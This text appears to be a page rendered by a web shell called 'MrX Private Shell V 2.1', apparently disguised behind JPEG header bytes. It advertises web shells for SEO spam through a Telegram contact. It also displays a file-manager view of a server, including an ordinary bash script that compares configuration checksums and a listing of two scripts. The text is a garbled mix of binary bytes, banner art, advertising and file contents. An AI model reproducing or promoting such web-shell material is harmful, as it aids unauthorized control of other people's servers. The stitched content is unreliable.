����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Compare files that could have an impact on the rescue image
if [ -e $VAR_DIR/layout/config/files.md5sum ] ; then
config_files=()
for obj in "${CHECK_CONFIG_FILES[@]}" ; do
if [ -d "$obj" ] ; then
config_files+=( $( find "$obj" -type f ) )
elif [ -e "$obj" ] ; then
config_files+=( "$obj" )
fi
done
md5sum "${config_files[@]}" > $TMP_DIR/files.md5sum
if ! diff -u $TMP_DIR/files.md5sum $VAR_DIR/layout/config/files.md5sum ; then
LogPrint "Configuration files have changed."
EXIT_CODE=1
fi
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 500_compare_layout.sh | File | 971 B | 0644 |
|
| 510_compare_files.sh | File | 581 B | 0644 |
|